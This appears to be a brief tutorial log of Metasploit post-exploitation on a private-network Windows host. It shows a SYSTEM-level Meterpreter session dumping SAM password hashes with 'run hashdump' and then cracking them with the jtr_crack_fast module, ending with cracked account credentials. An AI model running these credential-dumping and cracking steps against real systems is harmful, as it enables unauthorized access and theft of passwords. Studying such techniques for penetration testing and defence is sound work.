Once you gain a session what can you do?
jtr_crack_fast
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY 9377e3b56dfc42b558e6568c92c4d2dd…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hashes…
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:8064893404a6f026ca568218bc865d63:9ddc730aea3f980a7835df24ea17241a:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:481d4a0de46329f9e12716ebd82bb2f3:::
IUSR_TE-D12B242FF348:1004:b707ad3d3079aa8e453d8b073c04b55a:ff80b8a838a28f4dbec1fbcae6563bd8:::
IWAM_TE-D12B242FF348:1005:c9782c35f7b9947e2f83a8051aa6f1d0:7e7bb355dda1560973ba086b45b478ee:::
ASPNET:1006:22f5f4866f10502f0c19c47029cc7c60:f67b93aac3bf3576ca8f466883d5790a:::
Test:1022:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
meterpreter > (ctrl+z)
y (yes)
> use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > run
[*] Seeded the password database with 10 words…
guesses: 3 time: 0:00:00:04 DONE (Tue Jul 19 16:34:41 2011) c/s: 31650K trying: WOP1900 – ZZZ1900
Warning: passwords printed above might be partial and not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 1 time: 0:00:00:05 DONE (Tue Jul 19 16:34:47 2011) c/s: 137705K trying: ||V} – |||}
Warning: passwords printed above might be partial and not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably
[*] Output: Loaded 13 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 10 password hashes with no different salts
[*] Output: (cred_1)
guesses: 0 time: 0:00:00:00 DONE (Tue Jul 19 16:34:47 2011) c/s: 3846K trying: 89093 – 89092
[*] Output: Loaded 13 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 9 password hashes with no different salts
guesses: 1 time: 0:00:00:12 DONE (Tue Jul 19 16:35:00 2011) c/s: 38594K trying: zworykin1900 – password1900
Warning: passwords printed above might not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: password (cred_9)
guesses: 1 time: 0:00:00:05 DONE (Tue Jul 19 16:35:05 2011) c/s: 92318K trying: |||}
Warning: passwords printed above might not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 7 password hashes with no different salts
[*] Output: (cred_1)
guesses: 0 time: 0:00:00:00 DONE (Tue Jul 19 16:35:06 2011) c/s: 2777K trying: 89030 – 89092
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 6 password hashes with no different salts
[+] Cracked: Administrator: (192.168.0.200:445)
[+] Cracked: Guest: (192.168.0.200:445)
[+] Cracked: Test:password (192.168.0.200:445)
[*] Auxiliary module execution completed
msf auxiliary(jtr_crack_fast) >
myexploit 